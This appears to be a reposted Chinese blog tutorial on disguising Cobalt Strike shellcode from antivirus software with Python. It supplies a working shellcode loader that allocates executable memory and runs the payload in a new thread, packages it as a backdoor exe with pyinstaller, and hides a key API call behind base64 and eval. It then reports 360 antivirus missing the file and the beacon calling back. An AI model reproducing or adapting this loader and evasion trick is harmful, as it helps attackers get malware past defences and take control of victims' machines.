python3+Cobal Strikeshellcode免杀技术

Posted 小哥们肩膀一般高

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python3+Cobal Strikeshellcode免杀技术相关的知识,希望对你有一定的参考价值。

python3处理shellcode

目前使用python3处理CS神器生成的shellcode免杀效果还是可以的;本章我们使用基于python3的脚本对shellcode做处理,生成exe后进行免杀。
python代码

在这里插入代码片

第一种

首先我们kali打开CS神器服务端

客户端启动

创建一个监听器

使用CS神器生成python格式的payload

这里记得点击使用64位的,点击生成,查看生成的payload

我们使用python脚本

import ctypes

#shellcode加载
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

if __name__ == "__main__":
    shellCodeLoad(bytearray(b'shellcode'))

在shellcode处将payload.py的64位shellcode粘贴过来
生成新的后门py文件,将后门文件通过pyinstaller打包成exe文件

pyinstaller -F .\\101.py --noconsole


成功执行
将其放到靶机上运行

我们看到是被杀掉了的,气死我了,不着急,用第二种方法

第二种

打开我们的脚本可以看到这段代码

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))

这段代码一般可能会被杀毒软件给pass掉,所以我们对他进行base64编码,再写个解码就好了

eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))

记得引入base64的包

继续上面的方法,将shellcode复制进去,使用pyinstaller打包成exe文件


将其放到靶机内测试

显示360是没有查杀的,我们执行一下

我们看到CS神器里是上线成功的
放在https://www.virscan.org/上面看一下

我们看了一下这个免杀的效果还行,但是实际效果可能不是那么好。
后面的文章再给大家介绍其他的免杀方式。

以上是关于python3+Cobal Strikeshellcode免杀技术的主要内容,如果未能解决你的问题,请参考以下文章

Cobal Strike的学习与使用

需要不同语言的 sonar.lang.patterns?

Python3-随笔目录

python3多进程实战(python3经典编程案例)

python3多进程实战(python3经典编程案例)

0基础学python3心得体会 - python3学习笔记 - python3基础